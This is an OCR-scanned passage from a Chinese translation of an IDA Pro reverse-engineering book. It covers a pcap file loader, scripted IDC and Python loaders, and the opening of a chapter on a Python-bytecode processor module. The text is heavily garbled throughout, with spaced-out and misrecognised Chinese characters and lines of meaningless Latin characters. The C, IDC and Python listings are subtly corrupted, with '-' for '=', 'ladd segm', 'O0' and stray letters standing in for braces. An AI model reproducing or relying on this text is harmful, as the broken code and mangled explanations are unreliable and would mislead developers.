排序 ， 这 时 它 即 可 供 我 们 使 用 。import_type 函数 以 类 似 于 til2idb 的 方式 ， 从 指定 的 类 型 库 中 
提取 被 请 求 的 结构 体 类 型 ,将 它们 加 载 到 数据 库 中 。 在 这 个 版 本 中 ,我 们 同样 将 返回 的 类 型 标识 
符 保存 到 全 局 变量 中 ， 以 方便 在 后 面 的 加 载 过 程 中 使 用 。 最 后 ，add_types 使 用 free ti1 函数 市 
除 临 时 的 类 型 库 ， 释 放 被 该 类 型 库 占用 的 内 存 。 使 用 这 个 版 本 的 add types 与 使 用 第 一 个 版 本 不 
同 ， 这 时 我 们 可 以 完全 控制 被 选择 导入 到 数据 库 中 的 数据 类 型 ,不 需要 导入 整个 结构 体 库 ， 从 而 
避免 导 和 人 那些 不 需要 用 到 的 结构 体 。 

顺便 提 一 下 ， 我 们 还 可 以 使 用 store til PEZ (在 此 之 前 ， 应 调用 compact til) 将 临时 的 
类 型 库 文件 保存 到 磁盘 中 。 在 当前 的 例子 中 ， 由 于 需要 创建 的 类 型 很 少 ,这样 做 几乎 没有 什么 益 
处 。 因 为 在 每 次 加 载 右 执行 时 构建 结构 体 , 与 构建 并 分 发 一 个 必须 正确 安装 的 专用 类 型 库 同 样 容 
易 ， 因 而 也 不 会 为 我 们 市 省 大 量 时 间 。 

将 注意 力 转 到 load pcap file 函数 上 ， 它 调用 add types 初始 化 数据 类 型 ( 如 前 所 述 )， 创 
建 一 个 文件 注释 ， 将 pcap 文件 头 加 载 到 数据 库 中 ， 创 建 一 个 头 部 字 市 大 小 的 方 ， 并 将 头 部 字 方 
转换 成 一 个 pcap file header 结构 体 : 

void idaapi load pcap file(linput t *]i, ushort, const char *) { 


ssize t len; 
pcap pkthdr pkt; 












































add types(); //add structure templates to database 

create filename cmt(); //create the main file header comment 

//load the pcap file header from the database into the file 

file2base(li, O0, 0, sizeof(pcap file header), FILEREG PATCHABLE); 

//try to add a new data segment to contain the file header bytes 

if (ladd segm(0, 0, sizeof(pcap file header), ".file header", CLASS DATA)) { 
loader failure(); 


j 


//convert the file header bytes into a pcap file header 
doStruct(0, sizeof(pcap file header), pcap hdr struct); 
//... continues 


再 一 次 ，1oad pcap file 使 用 file2base 将 新 打开 的 磁盘 文件 的 内 容 加 载 到 数据 库 中 。pcap 
文件 头 的 内 容 被 加 载 后 , 它 将 在 数据 库 中 获得 自己 的 节 , 并 且 pcap file header 结构 体 将 通过 在 
bytes.hpp 中 声明 的 doStruct 困 数 应 用 于 所 有 头 部 字 节 。doStruct PAZ BI E FH S m FE HH 
Edit » Struct Var 将 一 组 相 邻 的 字 市 转换 成 一 个 结构 体 。 这 个 函数 需要 一 个 地 址 、 一 个 大 小 和 一 个 
类 型 标识 符 ， 并 将 给 定 地 址 的 指定 大 小 的 字 节 转换 成 给 定 的 类 型 。 

然后 ，1oad pcap file 继续 读 取 所 有 数据 包 内 容 ， 并 为 数据 包 内 容 创 建 一 个 .packets 节 ， 如 
下 所 示 : 
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//...continuation of load pcap file 
uint32 pos - sizeof(pcap file header); //file position tracker 
while ((len = glread(li, &pkt, sizeof(pkt))) == sizeof(pkt)) { 
mem2base(&pkt, pos, pos + sizeof(pkt), pos); //transfer header to database 
pos += sizeof(pkt); //update position pointer point to packet content 
//now read packet content based on number of bytes of packet that are 
// present 
file2base(li, pos, pos, pos + pkt.caplen, FILEREG PATCHABLE); 
pos += pkt.caplen; //update position pointer to point to next header 
} 
//cxreate a new section around the packet content. This section begins where 
//the pcap file header ended. 
if (ladd segm(0, sizeof(pcap file header), pos, ".packets", CLASS DATA)) { 
loader failure(); 
} 
//xetrieve a handle to the new segment 
segment t *s - getseg(sizeof(pcap file header)); 
//so that we can set 32 bit addressing mode on 
set segm addressing(s, 1); //set 32 bit addressing 
//...continues 


在 前 面 的 代码 中 ,mem2base 函数 是 一 个 新 子 数 ,用 于 将 已 经 加 载 到 内 存 中 的 内 容 传 送 到 数据 库 中 。 

最 后 ，1oad pcap file 在 数据 库 中 任何 可 能 的 地 方 应 用 结构 体 模板 。 我 们 必须 在 创建 段 后 应 
用 结构 体 模 板 , 否则 , 创建 段 的 操作 将 删除 所 有 已 应 用 的 结构 体 模 板 , 使 我 们 的 所 有 辛苦 劳动 白 
日 浪费 。 这 个 子 数 的 第 三 部 分 ( 也 是 最 后 一 部 分 ) 如 下 所 示 : 


//...continuation of load pcap file 
//apply headers structs for each packet in the database 
for (uint32 ea = s-»startEA; ea < pos;) { 
uint32 pcap = ea; //start of packet 
//apply pcap packet header struct 
doStruct(pcap, sizeof(pcap pkthdr), pkthdr struct); 
uint32 eth = pcap + sizeof(pcap pkthdr); 
//apply Ethernet header struct 
doStruct(eth, sizeof(ether header), ether struct); 
//Test Ethernet type field 
uint16 etype = get word(eth + 12); 
etype = (etype >> 8) | (etype << 8); //htons 














if (etype -- ETHER TYPE IP) { 

uint32 ip = eth + sizeof(ether header); 

//Apply IP header struct 

doStruct(ip, sizeof(iphdr), ip struct); 

//Test IP protocol 

uint8 proto - get byte(ip 4 9); 

//compute IP header length 
uint32 iphl - (get byte(ip) & OxF) * 4; 
if (proto == IP PROTO TCP) 1 

doStruct(ip + iphl, sizeof(tcphdr), tcp struct); 

} 
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else if (proto == IP PROTO UDP) 1 
doStruct(ip + iphl, sizeof(udphdr), udp struct); 
} 
} 
//point to start of next pcak pkthdr 
ea += get long(pcap + 8) + sizeof(pcap pkthdr); 


J 
j 


前 面 的 代码 只 是 以 一 次 一 个 数据 包 的 方式 简单 浏览 了 数据 库 , 并 分 析 每 个 数据 包头 部 中 的 几 
个 字段 ， 以 确定 需要 应 用 的 结构 体 的 类 型 ， 以 及 应 用 该 结构 体 的 起 始 位 置 。 下 面 的 输出 是 一 个 已 
经 使 用 pcap 加 载 硕 加 和 载 到 数据 库 中 的 pcap 文件 的 前 几 行 : 


.file header:0000 file header segment byte public 'DATA' use16 

.file header:0000 assume cs: file header 

.file header:0000 pcap file header «OA1B2C3D4h, 2, 4, O, O, OFFFFh, 1» 
.file header:0000 file header ends 

.file header:0000 

.packets:00000018 ; ========================================================= 
.packets:00000018 

.packets:00000018 ; Segment type: Pure data 

.packets:00000018 packets segment byte public 'DATA' use32 














.packets:00000018 assume cs: packets 

.packets:00000018 ;org 18h 

. packets : 00000018 pcap pkthdr <<47DF275Fh, 1218Ah», 19Ch, 19Ch> 

. packets : 00000028 db 0, 18h, 0E7h, 1, 32h, OF5h; ether dhost 

. packets : 00000028 db 0, 50h, oBAh, oB8h, 8Bh, OBDh; ether shost 

. packets : 00000028 dw 8 ; ether type 

. packets : 00000036 iphdr «45h, O, 8EO1h, OEE4h, 40h, 80h, 6, 9E93h, 
200A8COh, 6A00A8COh» 

.packets:0000004A tcphdr «901Fh, 2505h, 0C201E522h, 6CEOA4CCBh, 50h, 

18h, oEo1Ah, 3D83h, 0> 

.packets:0000005E db 48h ; H 

.packets:0000005F db 54h ; T 

. packets : 00000060 db 54h ; T 

.packets : 00000061 db 50h ; P 

. packets : 00000062 db 2Fh ; / 

. packets : 00000063 db 31h ; 1 

. packets : 00000064 db 2bEh ; . 

.packets:00000065 db 30h; 0 





VL SCRI SAUMLFHERAA SU, P ARAARA EAA, ibo EX ESSE HJ EP INA E ER e 
如 上 所 示 ， 我 们 可 以 轻易 确定 ， 地 址 0000005E 处 的 字 节 是 一 个 HTTP 啊 应 数据 包 的 第 一 个 字 节 。 

了 解 了 基本 的 pcap 文件 加 载 功能 ， 就 为 我 们 开发 执行 更 加 复杂 的 任务 (如 TCP 流 重组 和 其 
他 各 种 形式 的 数据 提取 ) 的 捅 件 打 下 基础 。 另 外 , 在 格式 化 各 种 与 网 络 有 关 的 结构 体 时 ， 我 们 还 
可 以 使 用 对 用 户 更 加 友好 的 方式 ， 如 显示 一 个 IP 地 址 的 可 读 版 本 ， 为 每 个 头 部 中 的 其 他 字段 提 
供 按 字 市 排序 的 显示 。 这 些 改进 将 作为 挑战 留 给 读者 来 解决 。 
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18.5 Eft nass e Eu 


如 采花 一 些 时 间 浏 览 SDK Dir lk ée. VIE A En EAS IRIURE GE. Java JI Ze 
( XSDKDIR-/Idr/javaldr ) EREA. X T ARE SCA TRACK UG, EAr MB Zenit ARATE 
常 松散 。 一 旦 加 载 需 发 现 进 入 代码 的 人口 点 ， 处 理 器 模块 不 需要 其 他 信息 ， 就 能 够 正确 反 汇 编 这 
些 代 码 。 一 些 处 理 器 模块 可 能 需要 大 量 与 最 初 的 源 文件 有 关 的 信息 , 并 且 必 须 执行 之 前 已 经 由 加 
载 融 完成 的 许多 解析 任务 。 为 了 避免 这 种 重复 工作 , 加 载 名 和 处 理 顺 可 能 会 以 一 种 更 加 紧密 耦合 
的 方式 配对 。 实 际 上 ，Java 加 载 右 所 采取 的 方法 就 是 使 用 以 下 代码 ,将 所 有 加 载 任务 ( 那些 通常 
由 加 载 可 的 load file 函数 完成 的 任务 ) 交 给 处 理 融 模块 : 








static void load file(linput t *li, ushort neflag, const char *) { 
if (ph.id !- PLFM JAVA) { 
set processor type("java", SETPROC ALL | SETPROC FATAL); 


e (ph.notify(ph.loader, li, (bool)(neflag & NEF LOPT))) { 
error("Internal error in loader«-»module link"); 

ie 

Java Jus Zebra nung — mt L4 Eze B kO a DS IC AEN Java DE oe, kx, Jus Ze 
将 癌 处 理 带 模块 发 送 一 条 ph. loader ( fE idp.hpp 中 定义 ) 通知 消 轧 ,告诉 处 理 带 加 载 阶段 已 经 局 
动 。 收 到 通知 后 ，Java 处 理 融 将 接管 加 载 任务 ， 并 在 这 个 过 程 中 获得 大 量 内 部 状态 信息 。 在 执行 
反 汇 编 任 务 时 ， 处 理 需 将 重用 这 些 信 息 。 

这 种 策略 是 否 对 你 有 用 , 完全 取决 于 你 是 否 正 开发 加 载 硕 及 相关 的 处 理 需 模块 , 以 及 你 是 否 
认为 处 理 带 能 够 得 益 于 访问 传统 上 由 加 载 天 获取 的 信息 〈 分 段 、 文 件 头 字 段 、 调 试 信息 等 )。 

由 加 载 带 向 处 理 副 模块 传递 状态 信息 的 为 一 种 方法 是 使 用 数据 库 网 络 市 点 。 在 加 载 阶段 ,加 
载 从 可 能 会 在 特定 的 网 络 市 点 中 起 入 一 些 信息 , 供 处 理 硕 模块 在 随后 的 反 汇 编 阶段 检索 使 用 。 需 
要 注意 的 是 , 频繁 访问 数据 库 , 以 检索 以 这 种 方式 存储 的 信息 ,其 速度 要 比 利 用 可 用 的 C++ 数据 


类 型 慢 一 些 。 
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在 IDA 5.6 中 ，Hex-Rays 引入 了 使 用 Python 或 IDC 脚本 实现 加 载 右 的 功能 。 在 宣布 此 项 新 
功能 的 Hex 博客 文章 中 ”，Hex-Rays 的 Elias Bachaalany 描述 了 一 个 加 载 需 ， 该 加 载 器 以 Python 
实现 ， 用 于 加 载 一 个 包含 shellcode 的 特定 类 型 的 恶意 .pdf 文件 。 虽 然 该 加 载 需 不 会 将 .pdf 文件 的 
恶意 本 质 类 推 到 所 有 的 .pdf 文件 ， 但 该 加 载 硕 是 如 何在 DA 中 加 载 不 受 文 持 的 文件 格式 的 范例 。 

脚本 化 加 载 融 能 够 以 IDC 或 Python 实现 , 并 且 至 少 需要 accept file 和 1oad file AmA PR 
数 ， 它 们 的 功能 与 我 们 前 面 讨论 基于 SDK 的 加 载 需 时 提 及 的 图 数 的 功能 类 似 。simpleton 文件 格 
式 的 IDC 加 载 硕 如 下 所 示 : 
































(D 参见 : http:/www.hexblog.com/?P=110。 
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#include «idc.idc» 
#define SIMPLETON MAGIC Ox1DABOOC 


//Verify the input file format 
// li - loader input t object. See IDA help file for more information 
// n - How many times we have been called 
/ /Returns: 
// 0 - file unrecognized 
// Name of file type - if file is recognized 
static accept file(li, n) 1 

auto magic; 

if (n) return 0; 

li.readbytes(8magic, 4, 0); 

if (magic !- SIMPLETON MAGIC) { 

return 0; 


} 


return "IDC Simpleton Loader"; 





} 


//Load the file 
// li - loader input t object 
//  neflags - refer to loader.hpp for valid flags 
// format - The file format selected nby the user 
/ /Returns: 
//  1- success 
// 0 - failure 
static load file(li, neflags, format) { 
auto magic, size, base; 
li.seek(0, 0); 
li.readbytes(8magic, 4, 0); 
li.readbytes(8size, 4, O); 
li.readbytes(8base, 4, 0); 
// copy bytes to the database 
loadfile(li, 12, base, size); 
// create a segment 
AddSeg(base, base + size, O, 1, saRelPara, scPub); 
// add the initial entry point 
AddEntryPoint(base, base, " start", 1); 
return 1; 


除了 用 IDC KAAR SDK 函数 外 , IDC 版 本 的 simpleton Just 28 D C++ 版 本 的 加 载 融 之 间 的 
相似 性 〈 如 前 所 述 ) 应 相当 明显 。 要 安装 加 载 需 脚本 ， 只 需 将 它们 复制 到 <IDADIR>/loaders 目录 
BI n , 

Python 也 可 用 于 开发 加 载 器 并 实现 更 加 稳健 的 开发 流程 ,因为 它 可 以 在 更 大 程度 上 访问 IDA 
的 基本 SDK。 以 Python 实现 的 simpleton JI 23 4H F rz : 
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#Verify the input file format 
# li - loader input t object. See IDA help file for more information 
# (n - How many times we have been called 
#Returns: 
# 0 - file unrecognized 
# Name of file type - if file is recognized 
def accept file(li, n): 
if (ñ): 
return 0 
li.seek(0) 
magic = struct.unpack("«I", li.read(4))[o] 
if magic !- Ox1DABOOC: 
return 0 
return "Python Simpleton Loader" 


#Load the file 
# li - loader input t object 
# neflags - refer to loader.hpp for valid flags 
# Tomat - The file format selected nby the user 
ffReturns: 
# —1- success 
# 0 - failure 
def load file(li, neflags, format): 
li.seek(0) 
(magic, size, base) = struct.unpack("«III", li.read(12)) 
# copy bytes to the database 
li.file2base(12, base, base + size, 1) 
# create a segment 
add segm(0, base, base + size, ".text", "CODE") 
# add the initial entry point 
add entry(base, base, " start", 1) 
return 1; 


编写 加 载 器 ( 以 及 插件 ) 脚本 的 一 个 最 大 优势 在 于 ， 通 过 它们 可 以 为 可 能 最 终 使 用 SDK 实 
现 的 模块 快速 创建 原型 。 


18.7 小结 


了 解 加 载 咒 如 何 适 应 IDA 的 模块 化 体系 结构 后 ， 你 将 发 现 创建 加 载 器 模板 并 不 比 创建 插件 
模板 更 加 困难 。 很 明显 ， 加 载 右 也 有 它们 目 己 的 SDK 图 数 ， 并 且 在 很 大 程度 上 依赖 这 些 另 数 。 
这 些 困 数 绝 大 多 数位 于 loader.hpp、segment.hpp、entry.hpp 和 diskio.hpp 文件 中 。 最 后 ， 由 于 加 载 
需 在 处 理 硕 模块 分 析 新 加 载 的 代码 之 前 执行 ,加载 硕 根 本 不 需要 执行 任何 反 汇 编 任 务 ， 如 处 理 盯 
数 或 经 过 反 汇 编 的 指令 。 

在 下 一 章 中 , 我 们 将 介绍 处 理 需 模块 ,以 及 各 种 负责 对 经 过 反 汇 编 的 二 进 制 文件 进行 整体 格 
式 化 的 组 件 ， 从 而 结束 对 IDA 模块 的 讨论 。 
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模块 。 处 理 需 模块 负责 IDA 中 的 所 有 反 汇 编 操 作 。 除 了 将 机 咒语 言 操 作 码 转换 成 对 应 
的 汇编 语言 代码 外 ,处 理 需 模块 还 负责 其 他 各 种 任务 ， 如 创建 另 数 、 生 成 交叉 引用 以 及 跟踪 栈 指 
针 的 行为 。 通 过 插件 和 加 载 器 ，Hex-Rays 已 经 能 够 使 用 IDA. 的 任何 一 种 脚本 语言 创建 处 理 需 模 
块 (从 IDA 5.7 开始 )。 

很 明显 ， 在 对 没有 处 理 需 模块 的 二 进 制 文件 进行 逆向 工程 时 ， 需 要 开发 处 理 需 模块 。 另 外 ， 
这 类 二 进 制 文件 可 能 包含 通信 式微 控制 硕 的 固件 上 映像， 或 者 从 手持 设备 中 提取 出 来 的 可 执行 映 
Ro 在 少数 情况 下 ,处 理 絮 模块 还 可 用 于 反 汇 编 艇 入 到 模糊 化 的 可 执行 文件 中 的 自 定 义 虚 拟 机 的 
指令 。 这 时 ， 现 有 的 IDA 处 理 需 模块 (如 x86 的 pc 模块 ) 只 能 帮助 你 了 解 虚拟 机 本 喘 ， 对 于 反 
汇编 虚拟 机 的 底层 字 节 人 码 ， 它 无 法 提供 任何 帮助 。 在 发 表 于 OpenRCE.org 的 一 篇 论文 中 ，Rolf 
Rolles 说 明了 处 理 需 模块 在 这 方面 的 应 用 。 在 该 论文 的 附录 B 中 ，Rolf 还 与 读者 共享 了 他 在 创建 
IDA 处 理 右 模块 方面 的 经 验 ， 这 是 有 关 该 主题 的 少数 几 份 文档 之 一 。 

在 IDA 模块 领域 ， 有 无 数 你 可 以 想到 的 插件 用 法 。 除 IDC 脚本 外 ， 插 件 是 IDA 最 为 常用 的 
第 三 方 附 加 件 。 对 自 定 义 加 载 器 模块 的 需求 远 比 对 插件 的 需求 要 小 。 这 点 并 不 令 人 意外 ， 因 为 二 
进 制 文件 格式 的 数量 (因此 对 加 载 器 的 需求 ) 要 比 搬 件 可 能 的 用 法 数量 少 得 多 。 自 然 ， 除 IDA 
专用 和 随 IDA 发 行 的 模块 外 ， 第 三 方 发 布 的 加 载 器 模块 相对 较 少 。 同 样 ， 对 处 理 需 模块 的 需求 
也 较 小 ， 因 为 需要 解码 的 指令 集 的 数量 ， 要 上 比 利 用 这 些 指令 集 的 文件 格式 的 数量 要 少 。 所 以 ， 除 
T IDA 及 其 SDK 发 行 的 少数 处 理 需 模块 外 ， 几 乎 完全 没有 第 三 方 发 布 的 处 理 需 模块 存在 。 根 据 
Hex-Rays 论坛 上 发 布 的 帖子 的 标题 判断 ， 很 明显 ， 人 们 正在 开发 处 理 需 模块 ， 只 是 这 些 模块 并 
未 回 公 众 发 布 。 

本 章 将 曾 明 如 何 创建 IDA 处 理 需 模块 ， 并 尽量 揭示 出 IDA 三 种 模块 中 最 后 一 种 模块 的 奥秘 
(至 少 在 某 种 程度 上 )。 作 为 运行 示例 ， 我 们 将 开发 一 个 反 汇 编 Python 字 节 码 的 处 理 需 模块 。 由 
于 处 理 需 模块 的 组 件 可 能 相当 大 , 因此 我 们 不 可 能 提供 包含 模块 每 一 个 部 分 的 完整 清单 。 读 者 可 
以 在 本 书 的 配套 网 站 上 找到 Python 处 理 器 模块 的 完整 源 代 码 。 注 意 ， 如 果 不 使 用 Python 加 载 器 



































(D 参见 http://www.openrce.org/articles/full view/28 网 站 上 的 Defeating HyperUnpackMe2 With an IDA Processor Module. 
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模块 ， 你 将 无 法 对 已 编译 的 .pyc 文件 完全 目 动 化 地 反 汇 编 。 缺 乏 这 样 的 加 载 希 ， 你 需要 以 二 进 制 
模式 加 载 .pyc 文件 ,选择 Python 处 理 需 模块 , 识别 函数 的 一 个 可 能 的 起 点 , 然后 使 用 Edit > Code 
将 显示 的 字 市 转换 成 Python 指令 。 


19.1 Python 字 节 码 


Python 是 一 种 面向 对 象 的 带 注 释 的 编程 语言 。 通 常 ，Python 以 类 似 于 Perl 的 方式 编写 脚本 。 
Python 源 文 件 沼 使 用 .py 扩展 名 保存 。 任 何 时 候 执 行 Python 脚本 ，Python 解释 右 将 把 源 代码 编译 
成 名 为 Python 字 节 码 ”的 内 部 表示 形式 。 这 种 字 节 人 码 最 终 将 由 一 个 虚拟 机 解释 。 在 某 种 程度 上 ， 
整个 过 程 类 似 于 将 Java 源 代码 编译 成 Java E pf, AARAA Java 虚拟 机 执行 。 它 们 之 间 的 主 
要 不 同 在 于 ，Java 用 户 必 须 将 它们 的 Java 源 代 码 显 式 编译 成 Java 字 节 人 码 ， 而 每 次 用 户 选择 执行 
一 段 Python 脚本 时 ，Python 源 代 人 码 必 须 隐 式 转换 成 字 节 人 码 。 

为 了 避免 重复 将 Python 源 代 码 转换 成 Python FHI, Python 解释 带 可 以 将 Python 源 文件 的 
字 市 码 形式 保存 在 一 个 .pyc 文件 中 ， 并 在 随后 的 执行 过 程 中 加 载 这 个 文件 ， 从 而 节省 在 转换 
Python 源 代 码 上 花费 的 时 间 。 通 常 ,用户 并 不 会 显 式 创建 .pyc 文件 。 相 反 ，Python 解释 需 会 目 动 
为 由 另 一 个 Python 源 模块 导入 的 任何 Python 源 模 块 创建 .pyc 文件 。 理 论 上 ， 这 些 模块 会 不 断 被 
重复 利用 ， 因 此 ， 如 有 果 你 能 够 立即 获得 这 些 模块 的 字 节 人 码 形式 ， 将 能 够 节省 大 量 时 间 。Python 
FP (pyc) 文件 基本 上 等 同 于 Java 的 .class 文件 。 

如 果 存 在 与 源 代码 对 应 的 字 市 码 文 件 ，Python 解释 需 就 不 需要 使 用 源 代 码 。 因 此 , 我 们 能 够 
以 字 节 人 码 而 非 源 代码 的 形式 发 布 一 个 Python 项 目的 某 些 部 分 。 这 时 ， 就 像 处 理 其 他 发 行 版 的 二 
进 制 软件 那样 ， 逆 问 工 程 学 市 码 文件 以 了 解 它们 的 作用 ， 可 能 会 有 所 用 处 。 这 也 是 示例 Python 
处 理 问 模块 的 主要 用 途 一 一 提供 一 个 有 助 于 逆 癌 工程 Python 字 节 但 的 工具 。 























19.2 Python 解释 器 


在 开发 Python 处 理 问 模块 之 前 ,了解 有 关 Python 解释 带 的 背景 知识 会 对 我 们 有 和 带 助 。 Python 
解释 天 运行 一 个 基于 栈 的 虚拟 机 ， 后 者 能 够 执行 Python 字 方 码 。 这 里 的 “基于 栈 ” 是 指 该 虚拟 
机 除了 一 个 指令 指针 和 一 个 栈 指针 外 ， 并 没有 寄存 般 。 绝 大 多 数 的 Python FTES UER 
式 操 纵 栈 ， 读 取 、 写 入 或 分 析 栈 内 容 。 例 如 ，BINARY_ADD 字 节 码 指令 从 解释 器 的 栈 上 取出 两 项 ， 
加 在 一 起 ， 并 将 得 到 的 一 个 结 来 值 放 回 到 解释 此 栈 的 项 部。 

Wa m HB. Python 字 市 码 相 对 比较 简单 。 所 有 Python 指令 均 由 一 个 单字 世 操 作 码 
和 和 零 个 或 两 个 操作 数字 节 构 成 。 这 一 章 中 的 处 理 带 示例 并 不 要 求 你 提前 了 解 有 关 Python £513 
的 知识 。 在 少数 需要 了 解 特定 知识 的 示例 中 ,我 们 将 花 时 间 充 分 解释 字 广 码 。 这 一 章 的 主要 目标 











D 参见 http://www.python.org/。 
D 参见 http://docs.python.org/library/dis.html£bytecodes T f Python 字 节 码 指令 及 其 意义 。 请 参见 Python 源 代码 发 行 
版 中 的 opcode.h 文件 了 解 字 节 码 助 记 符 及 其 对 应 的 操作 码 。 
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是 帮助 你 基本 了 解 IDA 处 理 融 模块 以 及 创建 它们 需要 考虑 的 一 些 事 项 。Python 字 市 码 只 是 帮助 
你 实现 这 个 目标 的 一 个 手段 。 
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在 讨论 如 何 创 建 处 理 器 模块 之 前 ， 必 须 指出 ， 有 关 处 理 需 模块 的 文档 资料 非常 少 。 除 了 浏览 
SDK 包含 文件 和 SDK 提供 的 处 理 融 模块 源 代 码 外 ，SDK 的 readme.txt 文件 是 唯一 一 个 说 明 如 何 
创建 处 理 需 模块 的 文件 , 其 中 有 几 条 提示 位 于 Description of Processor modules ( 处 理 融 模块 说 明 ) 
标题 下 。 

需要 澄清 的 是 ， 虽 然 README 文件 提 及 的 处 理 需 模块 中 一 些 特定 的 文件 名 好 像 是 一 成 不 变 
的 ， 实 际 上 并 非 如 此 。 但 是 ， 它 们 确实 是 SDK 包含 的 示例 所 使 用 的 文件 名 ， 也 是 这 些 示 例 包含 
的 构建 脚本 提 到 的 文件 名 。 在 创建 处 理 需 模块 时 ， 你 可 以 使 用 任何 你 想 要 的 文件 名 ， 只 要 对 构建 
脚本 进行 相应 更 新 即 可 。 

提 及 特定 处 理 融 文件 一 般 是 为 了 说 明 : 处 理 融 模块 主要 由 3 个 逻辑 组 件 构 成 : 分 析 规 、 指 
令 模 拟 需 和 输出 生成 需 。 在 下 面 创建 Python 处 理 需 模块 的 过 程 中 , 我 们 将 讨论 这 些 功能 组 件 的 
用 途 。 

<SDKDIR>/module 目录 中 保存 有 几 个 示例 处 理 右 。 你 需要 浏览 (如果 需要 ) 的 一 个 较为 简 
单 的 处 理 天 为 z8 处 理 硕 。 其 他 处 理 需 的 复杂 程度 根据 它们 的 指令 集 以 及 它们 是 否 承担 加 载 任务 
而 各 有 不 同 。 如 采 你 正和 考虑 编写 目 己 的 处 理 融 模 块 ， 其 中 一 种 方法 (fak 在 README 文件 中 推 
存 过 ) 是 复制 一 个 现 有 的 处 理 融 模块 ， 并 根据 需要 修改 。 这 时 ， 你 可 能 需要 找到 逻辑 结构 (不 一 
定 是 处 理 需 体系 结构 ) 与 你 的 模块 最 为 相似 的 处 理 需 模块 。 























19.3.1 processor t 结 构 体 


与 搬 件 和 加 载 需 一 样 ， 处 理 需 模块 只 导出 一 个 项 目 。 对 处 理 需 而 言 ， 这 个 项 目 必 是 是 一 个 名 
为 LPH 的 processor 结构 体 。 如 果 你 包含 <SDKDIR>/module/idaidp.hpp 文件 (这 个 文件 又 包含 
处 理 需 模块 所 需 的 其 他 许多 SDK 头 文件 ), IDA 将 自动 导出 这 个 结构 体 。 编写 处 理 硬 模块 之 所 以 
非常 困难 ， 其 中 一 个 原因 是 processor 七 结构 体 包含 56 个 必须 初始 化 的 字段 ， 其 中 26 个 字段 是 
KAGE, HHA 1 个 字段 是 一 个 指 问 数 组 的 指针 ， 这 个 数组 由 一 个 或 多 个 结构 体 指针 构成 ， 
个 指针 指向 一 种 包含 59 个 需要 初始 化 的 字段 的 结构 体 (asm t )。 很 简单 ， 是 吗 ? 构建 处 理 器 模 
块 面临 的 一 大 难题 与 初始 化 全 部 必需 的 静态 数据 有 关 ， 由 于 每 个 数据 结构 中 都 包含 大 量 字 段 ， 这 
个 过 程 很 容易 出 错 。 这 也 是 fak 建议 你 在 创建 新 处 理 需 时 使 用 一 个 现 有 的 处 理 需 作为 基础 的 原因 
> 




















由 于 这 些 数据 结构 非常 复杂 , 我 们 并 不 打算 枚 举 每 一 个 可 能 的 字段 及 其 用 法 。 我 们 将 重点 讨 
论 主要 的 字段 。 有 关 每 个 结构 体 中 的 这 些 字段 及 其 他 字段 的 详细 信息 ， 请 参阅 idp.hpp XH. R 
们 讨论 各 种 processor 鞋 字段 的 顺序 ， 并 不 是 processor 鞋 声明 它们 的 顺序 。 
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19.3.2 LPH 结构 体 的 基本 初始 化 


在 深入 分 析 处 理 需 模块 的 行为 之 前 ， 需 要 注意 一 些 静 态 数据 要 求 。 在 构建 反 汇 编 模 块 时 ， 你 
需要 创建 一 个 汇编 语言 助 记 符 列表 ， 日 后 你 需要 为 目标 处 理 需 识别 这 些 助 记 符 。 这 个 列表 采用 
instruc t (在 idp.hpp 中 定义 ) 结构 体 数组 的 形式 创建 ， 通 稼 保存 在 一 个 名 为 ins.cpp 的 文件 中 。 
如 下 所 示 ，instruc 七 是 一 个 简单 的 结构 体 , 它 有 两 方面 的 用 途 : 为 指令 助 记 符 提供 一 个 表 查 找 ， 
描述 每 条 指令 的 一 些 基 本 特点 。 























struct instruc 七 { 
const char *name; //instruction mnemonic 
ulong feature; //bitwise OR of CF xxx flags defined in idp.hpp 


È 


feature 字段 用 于 说 明 各 种 行为 ， 如 指令 是 否 读 取 或 写 人 它 的 操作 数 ， 指 令 执行 时 程序 该 如 
何 继续 ( 默认 、 跳 转 、 调 用 )。CF_xxx 中 的 CF 代表 典型 特征 (canonical feature )。 基 本 上 ，feature 
字段 用 于 实现 控制 流 和 交叉 引用 概念 。 下 面 是 一 些 有 趣 的 典型 特征 标志 。 
OCF STOP。 这 条 指令 并 不 将 控制 权 转 交 给 下 一 条 指令 。 绝 对 跳 转 和 函数 返回 指令 即 属于 这 
类 指令 。 
口 CF_CHGn。 这 条 指令 修改 操作 数 n， 这 里 的 n 在 1 与 6 之 间 。 
O CF USEn。 这 条 指令 使 用 操作 数 n, 这 里 的 n 在 1 与 6 之 间 。USE 指 “ 读 取 ” 或 “引用 ”( 但 
不 是 修改 ， 参 见 CF CHGn ) 一 个 内 存 位置 。 
O CF CALL。 这 条 指令 调用 一 个 函数 。 
引信 不 需要 按 任何 特殊 的 顺序 列 出 。 有 具体 来 说 , 你 没有 必要 根据 与 指令 有 关 的 二 进 制 操作 码 
对 指令 排序 , 这 个 数组 中 的 指令 与 有 效 的 二 进 制 操作 码 之 间 也 不 需要 建立 一 一 对 应 的 关系 。 示例 
指令 数组 的 前 几 行 和 后 几 行 如 下 所 示 : 























instruc t Instructions[] = { 


("STOP CODE", CF STOP), | /* o */ 
("POP TOP", 0), /* 1 */ 
("ROT TWO", 0), / 2 */ 
("ROT THREE", 0), j5-9 9 
("DUP TOP", 0), EK 
("ROT FOUR" 0), /[*5*/ 

© (NULL, 0}, /* 6 */ 
("CALL FUNCTION VAR KW", CF CALL), /* 142 */ 
("SETUP WITH", 0), /* 143 */ 
("EXTENDED ARG", 0), /* 145 */ 
("SET ADD", 0), /* 146 */ 
("MAP ADD", 0} /* 147 */ 


I 
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在 我 们 的 例子 中 ， 由 于 Python 他方 码 非 常人 简 单 ， 我 们 将 在 指令 与 学 市 码 之 间 保 持 一 一 对 应 
的 关系。 需要 注音 的 是 ,为 了 保持 这 种 关系 ， 如 末 操 作 人 码 没 有 定义 ， 如 这 里 的 操作 人 码 6 ( 9), 有 
些 指令 记录 必须 充当 填充 符 。 

IDN. ins.hpp 文件 定义 了 一 组 相关 的 枚 举 常 量 ,说 明了 整数 和 指令 之 加 的 对 应 关系 ， 如 下 
Biz: 








enum python opcodes { 
STOP CODE = O; 
POP _ TOP = 1, //xemove top item on stack 
ROT TWO - 2, //exchange top two items on stack 
ROT THREE = 3, //move top item below the 2nd and 3rd items 
DUP TOP - 4, //duplicate the top item on the stack 
ROT FOUR = 5, //move top item below the 2nd, 3rd, and 4th items 
NOP = 9, //no operation 


CALL FUNCTION VAR KW - 142, 
SETUP WITH - 143, 
EXTENDED ARG - 145, 
SET ADD - 146, 
MAP ADD - 147, 
PYTHON LAST - 148 

e 


